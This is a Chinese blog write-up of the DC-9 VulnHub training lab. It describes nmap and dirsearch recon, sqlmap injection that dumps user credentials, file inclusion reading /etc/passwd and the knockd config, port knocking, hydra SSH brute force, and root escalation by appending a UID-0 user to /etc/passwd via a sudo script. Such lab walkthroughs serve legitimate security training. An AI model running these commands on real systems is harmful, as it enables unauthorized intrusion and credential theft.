【DC9靶场通关详细记录】

已于 2025-03-09 17:21:09 修改
阅读量1.4k 收藏 30
点赞数 27
分类专栏: DC靶场通关记录系列 文章标签: 网络 网络安全 web安全 笔记 经验分享 安全 系统安全
于 2023-12-22 16:20:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46678448/article/details/135151723
版权

DC9靶场通关记录

环境搭建

  1. DC8主机靶场,点击下载暂时不可用
  2. 新下载地址
  3. 导入下载文件,如果报错点击重试
  4. 更改kali和DC8靶场的网络配置为统一的连接模式

信息收集

扫描确定IP

使用arp-scan扫描网络,确定靶机IP,使用以下命令

arp-scan -l

image.png

扫描端口以及服务

使用nmap对靶机进行扫描,确定开启的端口,以及端口对应的服务,使用以下命令

nmap -sV -p- -A 192.168.223.130

image.png

指纹识别

尝试访问靶机开放的端口80,是一个网站,可以尝试对靶机进行指纹识别,使用以下命令

whatweb -v 192.168.223.130

image.png

目录爆破

靶机上搭建了一个网站,尝试进行目录爆破,使用一下命令

dirsearch -u 192.168.223.130

image.png

查找漏洞

尝试搜索框是否注入

  1. 通过burp抓包发现此处有sql注入点

image.png

  1. 将search的数据设置为1,并保存数据包使用sqlmap

sqlmap -r sql2.txt

在sqlmap进行注入的时候会弹出三个选项,进行以下选择
image.png

  1. sqlmap注入成功,提示是联合注入和时间盲注

image.png

当前数据库爆破

  1. 查看当前数据库

image.png

  1. 查看所有数据库

image.png

  1. 查看当前数据库所有表

image.png

  1. 查看当前数据库的user表的列

image.png

  1. 查看表内容,获取当账号和加密的密码

image.png

破解加密密码登录,利用文件包含漏洞

  1. 破解密码

image.png

  1. 登录网站,多了一个增加的功能,网站下面提示了file does not exist(文件不存在),可能存在文件包含漏洞

image.png

  1. 尝试使用file参数,读取文件/etc/passwd,显示文件有许多用户

image.png

对另一数据库爆破

  1. 查看看到一组用户名和密码

image.png

  1. 对比passwd文件发现用户名是一样的

image.png

  1. 将用户名和密码dump出来,分别单独保存到单个文件中

image.png

端口敲门knockd

  1. 信息收集的端口扫描到ssh的22端口的状态是filtered,可以端口敲门打开端口
  2. 尝试文件包含漏洞,查看是否有knockd的配置文件

knockd的配置文件路径
/etc/knockd.conf

image.png

  1. 按照配置文件的端口进行敲门,打开靶机的ssh端口
  1. 使用nc、nmap、knockd都可以敲门成功
nc  192.168.223.130  7469
nc  192.168.223.130  8475
nc  192.168.223.130  9842apt-get install  knockd
knock -v 192.168.223.130  7469 8475 9842

image.png

通过ssh进行提权

hydra破解ssh的账号密码

  1. 通过数据库的账号密码破解ssh的账号密码
hydra -L user.txt -P pass.txt  ssh://192.168.223.130

image.png

  1. 尝试登陆,在使用最后一个用户登录时存在一个存放密码的隐藏文件

image.png

  1. 将该组密码加入密码字典重新破解,出现新的一个账户密码

image.png

使用新的账号尝试进行提权

  1. 切换到新用户中fredf

image.png

  1. 尝试提权

sudo -l //出现以root权限执行的文件

image.png

  1. 访问该文件,查看该文件的用法

image.png

  1. 查找文件用法提示的脚本,脚本的功能:将参数为1的内容写到参数2中

./test.py 1文件 2文件
将1文件的内容写入2文件

image.png

创造条件使用该脚本

  1. 生成md5密码创建类似passwd的文件写入创建的用户
  • openssl passwd -1 -salt admin 123456
    • -1 :表示采用的是MD5加密算法
    • -salt:指定salt值,不使用随机产生的salt。在使用加密算法进行加密时,即使密码一样,salt不一样,所计算出来的hash值也不一样,除非密码一样,salt值也一样,计算出来的hash值才一样。salt为8字节的字符串。
1. openssl passwd -1 -salt admin  123456
2. echo 'admin:加密后的密码:0:0:admin:/root:/bin/bash'  >> /tmp/passwd
3. echo "admin:$(openssl passwd 12345):0:0:admin:/root:/bin/bash"  >> /tmp/passwd

image.png

  1. 使用该脚本
./test /tmp/passwd  /etc/passwd //不成功
sudo ./test  /tmp/passwd  /etc/passwd

image.png

  1. 查看passwd文件,查看创建的用户是否追加进去

image.png

提权成功获得flag

su admin

image.png

总结

  1. 文件包含漏洞,读取配置文件
  2. knockd端口敲门

配置文件路径/etc/knockd.conf

nc  192.168.223.130  7469
nc  192.168.223.130  8475
nc  192.168.223.130  9842apt-get install  knockd
knock -v 192.168.223.130  7469 8475 9842
  1. hydra破解ssh登录密码
hydra -L 用户名字典 -P 密码字典  ssh://ip
  1. 利用脚本提权,根据脚本的使用方法构造相关环境进行利用,获取权限

主机渗透DC1-9靶场已经完成 😃

Vulnhub靶机DC系列-DC-9
m0_54525483的博客
01-13 2816
Vulnhub靶机DC系列-DC-9 靶场环境 靶场名称:DC-9 靶场地址:https://www.vulnhub.com/entry/dc-9,412/ 下载地址: DC-9.zip (Size: 700 MB) Download: http://www.five86.com/downloads/DC-9.zip Download (Mirror): https://download.vulnhub.com/dc/DC-9.zip Download (Torrent): https://download
渗透测试综合靶场 DC-2 通关详解
goldfish8848的博客
09-18 1527
DC-2与DC-1的渗透步骤有一些相似之处,但也存在一些区别。靶机发现与IP解析DC-2:发现靶机真实IP后,需要修改hosts文件以解析域名到IP地址,因为直接访问IP时域名解析失败。DC-1:没有提到需要修改hosts文件,直接通过IP进行渗透测试。端口探测DC-2:探测到除了常见的80端口外,还有一个7744端口开放。DC-1:主要提到了22和80端口,没有提到7744端口。网站配置与访问DC-2:需要修改hosts文件后才能访问网站,且网站是基于WordPress的。
DC-9靶机通关
qq_63831588的博客
11-01 926
端口扫描,sql注入,文件包含,爆破,端口敲门,sudo提权
vulnhub靶场--DC-1-9
金灰的博客
03-04 1295
免责声明:本文仅作分享!凌乱notes.
DC-9 靶场
wcl20010的博客
05-02 872
靶机地址:链接:https://pan.baidu.com/s/1kMLviFtz2JosS422-L1Tgw 提取码:c5ur 1.主机发现 nmap -sP 192.168.128.1/24 arp-scan -l #得到IP 192.168.128.131 2.端口扫描 nmap -p 1-65535 -A 192.168.128.131 # 22 80端口 3.目录扫描 dirb http://192.168.128.131...
DC-9靶场
mlws1900的博客
03-29 1253
发现靶机的ip地址为192.168.111.137,攻击机(kali)的ip地址为192.168.111.128。,而且需要按照顺序‘敲’端口。登录成功,下面显示file does not exist ,怀疑包含了某文件,所以尝试文件包含。将这一串密码加入刚刚的爆破密码中,重新进行爆破,生成newpass.txt。openssl生成密码,前一个mlws为账号,后一个1900为要加密的密码。发现代码作用需要两个文件,把第一文件追加到第二个文件后。使用test文件,将该文件的内容写入到passwd中。
DC-9 vulnhub靶场详细通关记录
weixin_62621015的博客
03-03 484
vulnhub靶场 DC-9个人通关记录 补充了很多细节和知识点,可以参考一下
vulnhub靶场DC-9
kukudeshuo的博客
07-17 1055
vulnhub靶场DC-9 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-9(192.168.58.155) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.155 使用nmap扫描查看目标靶机端口开放情况 可以看到扫描结果是开放了22、80端口,但是22端口被过滤了 浏览器访问目标靶机80端口 使用浏览器插件wappal
DC靶场系列-DC1靶场-渗透测试靶场
最新发布
03-09
DC1靶场通关详细记录文档记录了渗透测试者在DC1靶场中进行渗透测试的全过程,包括对目标系统的侦察、信息收集、漏洞分析、攻击方法、提升权限等关键步骤。详细记录不仅帮助测试者回顾整个渗透测试过程中的发现与决策...
渗透测试综合靶场 DC-1 通关详解
goldfish8848的博客
09-18 1774
我们收集信息的第一步首先用到了nmap来探测IP和开放端口。nmap(网络映射器)是一款开源的网络扫描和安全审计工具,它可以用来发现网络上的设备,检测开放的端口,确定运行在网络设备上的服务及其版本信息,以及检测潜在的安全漏洞。常用nmap命令:nmap -sn 目标IP地址:快速扫描目标网络,仅用于主机发现,不扫描端口。nmap -sn 目标IP地址/24:扫描整个C类子网。nmap 目标IP地址:扫描目标IP地址上的常见端口。nmap -p 端口号 目标IP地址:扫描特定端口。
XSS—xss-labs靶场通关
qq_62987084的博客
09-22 1033
xss-labs靶场通关详解
SQL注入-Pikachu靶场通关_pikachu靶场通关sql
2401_87034306的博客
09-12 527
接下来的步骤判断字段的个数,看回显点,爆库,爆表,爆字段,都和以上的数字型注入一致(注入sql语句也大体一致),区别就是类型不同,本题为其他类型的闭合方式,接下来的步骤判断字段的个数,看回显点,爆库,爆表,爆字段,都和以上的数字型注入一致,区别就是类型不同,本题为字符型,单引号闭合,其他注入语句和以上一致。接下来的步骤判断字段的个数,看回显点,爆库,爆表,爆字段,都和以上的数字型注入一致(注入sql语句也大体一致),区别就是类型不同,本题为搜索型,其他的爆库爆表爆字段内容的sql语句以上注册时注入的一致。
靶场练习第十七天~vulnhub靶场dc-9
qq_57976347的博客
02-16 877
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-9.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.122 2.网站的信息收集 (1)靶机开放了80端口,先访问
vulnhub靶场DC-9
qq_58091216的博客
01-15 1286
发现这里有个脚本文件可以无密码以root用户权限执行,我们进入/opt/devstuff/dist/test目录下先看看有什么信息,全是文件,回到上一个目录查看,也没什么,再回到上一个目录查看,在/opt/devstuff目录下发现了一个test.py脚本文件。这是一个写入文件的脚本,生成一个密码用root权限执行脚本写入/etc/passwd文件,所以我们现在就需要构造一个拥有root权限的用户,并且在/etc/passwd文件中储存,只要使用这个用户登录后,就可以获取到root权限,事先参考。
vulnhub DC9 靶场练习
鸥鹭忘机
09-05 2037
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第9台,也是最后一台。下载地址为https://www.vulnhub.com/entry/dc-9,412/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的难度为中等,其关键点是需要知道knockd服务。建议在挑战该靶机之前了解一下knockd服务。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-9靶机,然后选中配置。依次点击网络配置->NAT模式->
DC-9靶场实战
qq_42754807的博客
03-20 1081
DC-9靶场实战
DC9靶场渗透
qq_20032803的博客
02-03 756
1.发现主机/扫描 root@kali:~# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.100.128 netmask 255.255.255.0 broadcast 192.168.100.255 inet6 fe80::20c:29ff:fe72:6e3e prefixlen 64 scopeid 0x20<link>
DC-9靶场渗透
sucker的博客
10-26 1526
扫描发现靶机——分析靶机端口提供的服务——dirsearch目录爆破——通过测试找到sql注入点——使用sqlmap依次爆数据库,表,字段,数据——得到ssh登录密码/得到网站的登录密码——验证网站存在的文件包含漏洞——hydra爆破失败——发现并利用端口knock——成功登录ssh——发现sshz账户中新密码本——登录另一个账户发现可以提权——使用Openssl构造加密密码,构造新用户admin——切换新建用户,获得root权限——获得flag, 渗透完成。
Vulnhub DC-9靶场
weixin_47019868的博客
11-25 202
Vulnhub DC-9靶场
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榕小树

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值